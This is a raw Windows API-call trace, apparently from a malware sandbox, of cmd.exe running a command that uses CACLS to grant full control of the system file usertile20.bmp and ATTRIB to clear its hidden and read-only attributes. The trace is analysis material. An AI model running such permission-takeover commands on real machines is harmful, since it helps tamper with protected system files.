lpAddress=0x1b1000, lpBuffer=0x2af74c, dwLength=0x1c | out: lpBuffer=0x2af74c*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0183.692] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2af74c, dwLength=0x1c | out: lpBuffer=0x2af74c*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0183.692] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2af74c, dwLength=0x1c | out: lpBuffer=0x2af74c*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0183.692] GetConsoleOutputCP () returned 0x1b5 [0183.692] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0183.692] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0183.692] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.692] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0183.693] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.693] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0183.693] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.693] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0183.693] _get_osfhandle (_FileHandle=0) returned 0x3 [0183.693] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0183.693] _get_osfhandle (_FileHandle=0) returned 0x3 [0183.693] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0183.693] GetEnvironmentStringsW () returned 0x430308* [0183.693] FreeEnvironmentStringsW (penv=0x430308) returned 1 [0183.694] GetEnvironmentStringsW () returned 0x430308* [0183.694] FreeEnvironmentStringsW (penv=0x430308) returned 1 [0183.694] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae6ec | out: phkResult=0x2ae6ec*=0x40) returned 0x0 [0183.694] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x0, lpData=0x2ae6f8*=0xb8, lpcbData=0x2ae6f0*=0x1000) returned 0x2 [0183.694] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x4, lpData=0x2ae6f8*=0x1, lpcbData=0x2ae6f0*=0x4) returned 0x0 [0183.694] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x0, lpData=0x2ae6f8*=0x1, lpcbData=0x2ae6f0*=0x1000) returned 0x2 [0183.694] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x4, lpData=0x2ae6f8*=0x0, lpcbData=0x2ae6f0*=0x4) returned 0x0 [0183.694] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x4, lpData=0x2ae6f8*=0x40, lpcbData=0x2ae6f0*=0x4) returned 0x0 [0183.694] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x4, lpData=0x2ae6f8*=0x40, lpcbData=0x2ae6f0*=0x4) returned 0x0 [0183.694] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x0, lpData=0x2ae6f8*=0x40, lpcbData=0x2ae6f0*=0x1000) returned 0x2 [0183.694] RegCloseKey (hKey=0x40) returned 0x0 [0183.694] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae6ec | out: phkResult=0x2ae6ec*=0x40) returned 0x0 [0183.694] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x0, lpData=0x2ae6f8*=0x40, lpcbData=0x2ae6f0*=0x1000) returned 0x2 [0183.694] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x4, lpData=0x2ae6f8*=0x1, lpcbData=0x2ae6f0*=0x4) returned 0x0 [0183.694] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x0, lpData=0x2ae6f8*=0x1, lpcbData=0x2ae6f0*=0x1000) returned 0x2 [0183.694] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x4, lpData=0x2ae6f8*=0x0, lpcbData=0x2ae6f0*=0x4) returned 0x0 [0183.695] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x4, lpData=0x2ae6f8*=0x9, lpcbData=0x2ae6f0*=0x4) returned 0x0 [0183.695] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x4, lpData=0x2ae6f8*=0x9, lpcbData=0x2ae6f0*=0x4) returned 0x0 [0183.695] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x0, lpData=0x2ae6f8*=0x9, lpcbData=0x2ae6f0*=0x1000) returned 0x2 [0183.695] RegCloseKey (hKey=0x40) returned 0x0 [0183.695] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886391 [0183.695] srand (_Seed=0x5b886391) [0183.695] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\"" [0183.695] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\"" [0183.695] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0183.695] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x431a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0183.696] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0183.696] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0183.696] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0183.696] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0183.696] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0183.696] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0183.696] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0183.696] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0183.696] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0183.696] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0183.696] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0183.696] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0183.696] GetEnvironmentStringsW () returned 0x432458* [0183.696] FreeEnvironmentStringsW (penv=0x432458) returned 1 [0183.696] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.696] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0183.696] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0183.696] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0183.696] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0183.696] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0183.696] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0183.696] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0183.696] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0183.697] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0183.697] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af4b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0183.697] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af4b8, lpFilePart=0x2af4b4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af4b4*="Desktop") returned 0x18 [0183.697] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0183.697] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af234 | out: lpFindFileData=0x2af234) returned 0x430ae8 [0183.697] FindClose (in: hFindFile=0x430ae8 | out: hFindFile=0x430ae8) returned 1 [0183.697] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af234 | out: lpFindFileData=0x2af234) returned 0x430ae8 [0183.697] FindClose (in: hFindFile=0x430ae8 | out: hFindFile=0x430ae8) returned 1 [0183.697] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af234 | out: lpFindFileData=0x2af234) returned 0x430ae8 [0183.698] FindClose (in: hFindFile=0x430ae8 | out: hFindFile=0x430ae8) returned 1 [0183.698] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0183.698] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0183.698] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0183.698] GetEnvironmentStringsW () returned 0x430308* [0183.698] FreeEnvironmentStringsW (penv=0x430308) returned 1 [0183.698] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0183.699] GetConsoleOutputCP () returned 0x1b5 [0183.699] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0183.699] GetUserDefaultLCID () returned 0x409 [0183.699] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af5f8, cchData=128 | out: lpLCData="0") returned 2 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af5f8, cchData=128 | out: lpLCData="0") returned 2 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af5f8, cchData=128 | out: lpLCData="1") returned 2 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0183.700] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0183.700] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0183.701] GetConsoleTitleW (in: lpConsoleTitle=0x4209b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.701] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0183.702] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0183.702] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0183.702] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0183.703] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0183.703] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0183.703] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0183.703] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0183.703] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0183.703] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0183.703] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0183.703] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0183.706] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0183.706] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0183.706] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0183.706] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0183.706] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0183.706] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0183.706] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0183.708] GetConsoleTitleW (in: lpConsoleTitle=0x2af28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.708] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0183.708] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0183.708] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0183.708] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0183.708] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0183.708] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0183.708] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0183.709] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0183.709] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0183.709] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0183.709] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0183.709] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0183.709] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0183.709] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0183.709] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0183.709] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0183.709] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0183.709] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0183.709] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0183.709] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0183.709] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0183.709] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0183.709] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0183.709] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0183.709] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0183.709] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0183.709] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0183.709] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0183.709] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0183.709] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0183.709] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0183.709] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0183.709] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0183.709] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0183.709] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0183.709] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0183.709] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0183.709] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0183.709] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0183.710] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0183.710] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0183.710] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0183.710] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0183.710] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0183.710] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0183.710] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0183.710] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0183.710] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0183.710] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0183.710] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0183.710] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0183.710] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0183.710] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0183.710] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0183.710] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0183.710] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0183.710] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0183.710] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0183.710] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0183.710] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0183.710] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0183.710] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0183.710] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0183.710] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0183.710] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0183.710] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0183.710] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0183.710] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0183.710] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0183.710] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0183.711] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0183.711] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0183.711] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0183.711] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0183.711] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0183.711] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0183.711] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0183.711] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0183.711] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0183.711] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0183.711] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0183.711] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0183.711] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0183.711] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0183.711] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0183.711] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0183.711] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0183.712] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0183.712] SetErrorMode (uMode=0x0) returned 0x0 [0183.712] SetErrorMode (uMode=0x1) returned 0x0 [0183.712] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x431e98, lpFilePart=0x2aedac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2aedac*="Desktop") returned 0x18 [0183.712] SetErrorMode (uMode=0x0) returned 0x1 [0183.712] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0183.712] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0183.718] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0183.719] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2aeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb28) returned 0xffffffff [0183.719] GetLastError () returned 0x2 [0183.719] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x2aeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb28) returned 0xffffffff [0183.719] GetLastError () returned 0x2 [0183.719] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2aeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb28) returned 0x432180 [0183.719] FindClose (in: hFindFile=0x432180 | out: hFindFile=0x432180) returned 1 [0183.720] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x2aeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb28) returned 0xffffffff [0183.720] GetLastError () returned 0x2 [0183.720] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb28) returned 0x432180 [0183.720] FindClose (in: hFindFile=0x432180 | out: hFindFile=0x432180) returned 1 [0183.720] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0183.720] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0183.720] GetConsoleTitleW (in: lpConsoleTitle=0x2af020, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.720] InitializeProcThreadAttributeList (in: lpAttributeList=0x2aeea8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2aef70 | out: lpAttributeList=0x2aeea8, lpSize=0x2aef70) returned 1 [0183.720] UpdateProcThreadAttribute (in: lpAttributeList=0x2aeea8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2aef68, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2aeea8, lpPreviousValue=0x0) returned 1 [0183.720] GetStartupInfoW (in: lpStartupInfo=0x2aee64 | out: lpStartupInfo=0x2aee64*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0183.720] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0183.721] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2aef04*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2aef50 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x2aef50*(hProcess=0x50, hThread=0x4c, dwProcessId=0xda8, dwThreadId=0x7d4)) returned 1 [0183.724] CloseHandle (hObject=0x4c) returned 1 [0183.724] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0183.724] GetEnvironmentStringsW () returned 0x430308* [0183.724] FreeEnvironmentStringsW (penv=0x430308) returned 1 [0183.724] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0183.785] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2aee44 | out: lpExitCode=0x2aee44*=0x0) 